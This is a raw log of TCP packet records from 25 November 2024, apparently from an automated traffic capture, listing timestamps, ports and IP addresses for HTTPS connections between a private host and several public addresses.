                                                    Nov 25, 2024 19:43:55.692615986 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.703793049 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.703833103 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.703898907 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.704118013 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.704123974 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.738583088 CET49752443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.738591909 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.755002975 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.755059958 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.755103111 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.755119085 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.755150080 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.755201101 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.755208969 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.755222082 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.755266905 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.763652086 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.774668932 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.774739981 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.774755955 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.783070087 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.783149958 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.783163071 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.785769939 CET49752443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.797213078 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.833704948 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.833719969 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.848957062 CET49752443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.848964930 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.871583939 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.871654034 CET49752443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.871665001 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.880058050 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.880110025 CET49752443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.880116940 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.883343935 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.883405924 CET49752443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.883413076 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.885442972 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.885462046 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.900032997 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.900079966 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.900095940 CET49752443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.900104046 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.900156975 CET49752443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.900168896 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.900213957 CET49752443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.900221109 CET44349752104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.900249004 CET49752443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.905972958 CET49756443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.905998945 CET44349756104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.906080008 CET49756443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.906325102 CET49756443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:55.906349897 CET44349756104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.920944929 CET44349754172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:43:55.921211958 CET49754443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:43:55.921228886 CET44349754172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:43:55.921550035 CET44349754172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:43:55.921832085 CET49754443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:43:55.921888113 CET44349754172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:43:55.921976089 CET49754443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:43:55.934328079 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.956058025 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.959932089 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.960011005 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.960033894 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.967356920 CET44349754172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:43:55.970577002 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.970650911 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.970664978 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.978421926 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.978486061 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.978513956 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.986167908 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.986241102 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.986254930 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.993910074 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:55.993968010 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:55.993980885 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.001655102 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.001714945 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:56.001728058 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.017219067 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.017297029 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:56.017319918 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.024869919 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.024945021 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:56.024959087 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.032715082 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.032799006 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.032809973 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:56.032826900 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.032875061 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:56.040405989 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.048202991 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.048250914 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.048296928 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:56.048317909 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.048340082 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.048374891 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:56.048402071 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:56.048608065 CET49753443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:56.048640966 CET44349753104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.391187906 CET44349754172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:43:56.391253948 CET44349754172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:43:56.394815922 CET49754443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:43:56.395699978 CET49754443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:43:56.395718098 CET44349754172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:43:56.975217104 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.975527048 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:56.975548983 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.976007938 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.976322889 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:56.976392984 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:56.976478100 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.023325920 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.168890953 CET44349756104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.169209957 CET49756443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.169230938 CET44349756104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.169693947 CET44349756104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.170041084 CET49756443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.170119047 CET44349756104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.170237064 CET49756443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.215327978 CET44349756104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.434883118 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.434922934 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.434946060 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.434967995 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.434973001 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.434988022 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.435002089 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.435015917 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.435046911 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.435051918 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.443748951 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.443830013 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.443841934 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.459274054 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.459353924 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.459364891 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.505634069 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.556138039 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.600533009 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.600547075 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.629722118 CET44349756104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.629801989 CET44349756104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.629873037 CET49756443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.630342960 CET49756443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.630353928 CET44349756104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.633717060 CET49757443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:57.633745909 CET44349757104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.633833885 CET49757443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:57.634047031 CET49757443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:57.634061098 CET44349757104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.639841080 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.639916897 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.639929056 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.647883892 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.647939920 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.647950888 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.655647993 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.655702114 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.655713081 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.663496971 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.663537979 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.663547993 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.671329975 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.671391010 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.671401024 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.686865091 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.686908960 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.686919928 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.694817066 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.694875002 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.694885969 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.702667952 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.702745914 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.702756882 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.709893942 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.709959030 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.709969044 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.717291117 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.717339039 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.717350960 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.724714041 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.724813938 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.724824905 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.731910944 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.731956959 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.731970072 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.779124975 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.841790915 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.845350981 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.845443010 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.845457077 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.851838112 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.852044106 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.852066994 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.866174936 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.866251945 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.866264105 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.866305113 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.880649090 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.880656958 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.880712986 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.880718946 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.880757093 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.895343065 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.895353079 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.895543098 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.900306940 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.900330067 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.900397062 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.900414944 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.909888029 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.909960985 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.919395924 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.919471979 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.929342031 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.929433107 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.933933020 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.934006929 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.943509102 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.943571091 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.948386908 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.948457956 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.957606077 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.957705021 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.966449976 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.966532946 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:57.975434065 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:57.975509882 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:58.042078018 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:58.042159081 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:58.044416904 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:58.044514894 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:58.044589043 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:58.044719934 CET49755443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:58.044739962 CET44349755104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:58.047672987 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:58.047703981 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:58.047786951 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:58.047982931 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:58.048002958 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:58.207777023 CET49759443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:58.207809925 CET44349759104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:58.207906008 CET49759443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:58.208214045 CET49759443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:58.208225012 CET44349759104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:58.849179983 CET44349757104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:58.851799011 CET49757443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:58.851814985 CET44349757104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:58.852135897 CET44349757104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:58.853724957 CET49757443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:58.853787899 CET44349757104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:58.854147911 CET49757443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:58.895365953 CET44349757104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.314677000 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.316931009 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.316947937 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.317409039 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.327842951 CET44349757104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.327904940 CET44349757104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.327953100 CET49757443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.330899954 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.330991030 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.344831944 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.353267908 CET49757443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.353280067 CET44349757104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.387340069 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.752892017 CET44349759104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.765285969 CET49762443192.168.2.44.175.87.197
                                                    Nov 25, 2024 19:43:59.765305042 CET443497624.175.87.197192.168.2.4
                                                    Nov 25, 2024 19:43:59.765383005 CET49762443192.168.2.44.175.87.197
                                                    Nov 25, 2024 19:43:59.766670942 CET49762443192.168.2.44.175.87.197
                                                    Nov 25, 2024 19:43:59.766685009 CET443497624.175.87.197192.168.2.4
                                                    Nov 25, 2024 19:43:59.767091990 CET49759443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:59.767102003 CET44349759104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.767446995 CET44349759104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.768115044 CET49759443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:59.768174887 CET44349759104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.768543959 CET49759443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:59.768593073 CET49759443192.168.2.4104.18.94.41
                                                    Nov 25, 2024 19:43:59.768616915 CET44349759104.18.94.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.778918982 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.778980017 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.779016018 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.779042959 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.779058933 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.779108047 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.779109001 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.779124975 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.779165030 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.787729979 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.796802998 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.796848059 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.796855927 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.805264950 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.805311918 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.805320978 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.850101948 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.904195070 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.944894075 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.944901943 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.984359026 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.984448910 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.984457016 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.992759943 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:43:59.992810011 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:43:59.992818117 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.000933886 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.000988960 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:00.000996113 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.010457993 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.010505915 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:00.010513067 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.018874884 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.018928051 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:00.018934965 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.026287079 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.026341915 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:00.026350021 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.034665108 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.034714937 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:00.034720898 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.051717043 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.051765919 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:00.051774025 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.058788061 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.058832884 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:00.058839083 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.064836025 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.064985991 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.065049887 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:00.065057993 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.065099955 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:00.071620941 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.078738928 CET44349758104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:00.083096981 CET49758443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:00.083103895 CET44349758104.18.95.41192.168.2.4
